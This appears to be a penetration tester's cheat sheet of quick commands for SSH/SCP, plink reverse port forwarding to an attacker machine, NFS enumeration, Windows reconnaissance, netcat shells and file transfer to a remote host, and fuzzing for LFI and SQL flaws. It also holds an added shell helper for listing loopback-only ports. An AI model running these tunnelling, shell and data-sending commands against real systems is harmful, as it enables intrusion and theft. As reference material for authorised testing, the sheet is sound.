# Quick Scripts

Quick Snippets to use in a pinch

## SSH

Using an `id_rsa` private key to log in to a target. Note that you must have the key's passphrase for this to work.

```
ssh -i id_rsa User@IP
```

### SCP

SCP is a great method of transferring files to and from the target in a pinch.

```
scp User@IP:~/Dir ~/LocalDir
```

```
scp LocalFile User@IP:~/RemoteDir/File
```

### PLINK

Plink is a command-line tool that is part of the PuTTY suite. It allows SSH tunnelling and, in our use case, port forwarding. Once plink is on the target we first find the port we want to forward:

```
netstat -ano
```

and then forward the port to our machine, which **should have an SSH server set up** for plink to log in to. In the `-R` argument the first port is the one that will listen on our machine and the last port is the local port on the target being forwarded.

```
.\plink.exe -l AttackerUser -pw AttackerPassword -R AttackerListenPort:127.0.0.1:TargetLocalPort AttackerIP
.\plink.exe -l hn -pw hn -R 5985:127.0.0.1:5985 10.10.10.10
```
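Added example (not part of the original notes): a POSIX shell helper that picks the loopback-only TCP listeners out of saved `netstat -ano` output, which is the step of deciding which ports are not reachable from the network; the same check is handy when auditing what a host exposes only locally. The netstat output below is constructed sample data.

```shell
# Constructed sample of `netstat -ano` output (not taken from a real host).
NETSTAT_SAMPLE='Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:445          0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5985         0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       3320
  TCP    [::1]:5985             [::]:0                 LISTENING       4
  TCP    10.10.10.20:49700      10.10.10.5:443         ESTABLISHED     1208
  UDP    0.0.0.0:5353           *:*                                    1432'

# Print "PORT PID" for every TCP port that is LISTENING on a loopback
# address (127.0.0.1 or [::1]) and NOT also bound on all interfaces
# (0.0.0.0 or [::]).  Ports already reachable from the network are
# skipped, so the list is exactly the local-only services.
loopback_listeners() {
    printf '%s\n' "$1" | awk '
        $1 == "TCP" && $4 == "LISTENING" {
            n = split($2, a, ":")
            port = a[n]
            addr = substr($2, 1, length($2) - length(port) - 1)
            if (addr == "0.0.0.0" || addr == "[::]")
                wide[port] = 1
            else if (addr == "127.0.0.1" || addr == "[::1]")
                loop[port] = $5
        }
        END {
            for (p in loop)
                if (!(p in wide)) print p, loop[p]
        }' | sort -n
}

loopback_listeners "$NETSTAT_SAMPLE"
```

Feed it a saved file with `loopback_listeners "$(cat netstat.txt)"`; in the sample, 445 is dropped because it is also bound on 0.0.0.0.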

## NFS Mounts

NFS mounts can sometimes be found on targets and can provide essential information about the target.

They are often found behind the rpcbind port:

```
PORT    STATE SERVICE
111/tcp open  rpcbind
```

### Enumeration

```
showmount -e IP #List mounts
nmap -sV --script=nfs-showmount IP #Nmap: list mounts
nmap -sV --script=nfs-statfs IP #Nmap: get mount statistics
nmap -sV --script=nfs-ls IP #Nmap: list mounts and permissions
```

### Local Mount

NFS shares can also be mounted locally.

```
mount -t nfs IP:/NFSMountName /LocalMountLocation
mount #Lists locally mounted directories
umount IP:/NFSMountName #Unmounts the mounted NFS directory
```

NFS mounts can often be huge and take a while to transfer (especially over a turbulent network), so it's advisable to use `rsync` to pull the files available on it down. Note that `-n` is a dry run: it only lists what would be copied, so drop it for the real transfer.

```
rsync -anv /NFSMountLocation/ /LocalExistingDir #Dry run, lists what would be copied
rsync -av /NFSMountLocation/ /LocalExistingDir #Actually copies the files
```

## Powershell

PowerShell console history is stored in:

```
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

PowerShell is a very useful and powerful scripting language akin to bash; more information about its modules can be found at <https://docs.microsoft.com/en-us/powershell/module/>

## CMD

Output file content

```
type filename.txt
```

Other useful commands (these commands work in PowerShell as well):

```
dir /a #List files with full attributes, including hidden ones
cmd /k #Useful inline with payloads: runs the command and keeps the console open
whoami /priv #Show the current user's privileges
net user #List local accounts
net user %USERNAME% #Information about the current account
net group #View domain groups (on a domain controller)
```

## NetCat

Netcat is a tool that allows for simple shells.

```
nc -lnvp PORT #Start a netcat listener on PORT
nc IP PORT #Use netcat to connect to a defined target
```

Netcat unfortunately isn't native on windows but we can still get it from <https://eternallybored.org/misc/netcat/> and it works the same way!

Netcat can also be used for transferring files:

```
nc -l -p 1234 > out.file #Receiver
cat file | nc -w 3 IP PORT #Sender (-w 3 closes after 3 seconds idle)
```

## Fuzzing

Fuzzing is very useful for finding files that have an explicit name but no known location; we can use fuzzing to find the path from a pre-existing URL. Fuzzing can also be used for exploiting `LFI` as well as `SQL` vulnerabilities.

```
wfuzz -c -w 'wordlist' -u 'http://IP/file.php?id=FUZZ'

ffuf -u http://IP/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,204,301,302,307,401 -o results.txt
```

## DirBusting

Dirbusting can be considered a form of fuzzing, but it checks for whole directories and files. One such tool we can use for this is `GoBuster`:

```
gobuster dir -u http://IP/ -w DirBuster-Lists/directory-list-2.3-medium.txt
```

## Python

Simple HTTP server for a quick host (the first form is Python 2, the second Python 3):

```
python -m SimpleHTTPServer 8088
python3 -m http.server 8088
```

## C#

C# binaries can be decompiled with `dnSpy` <https://github.com/0xd4d/dnSpy>, and C# code can be compiled online with <https://dotnetfiddle.net/>
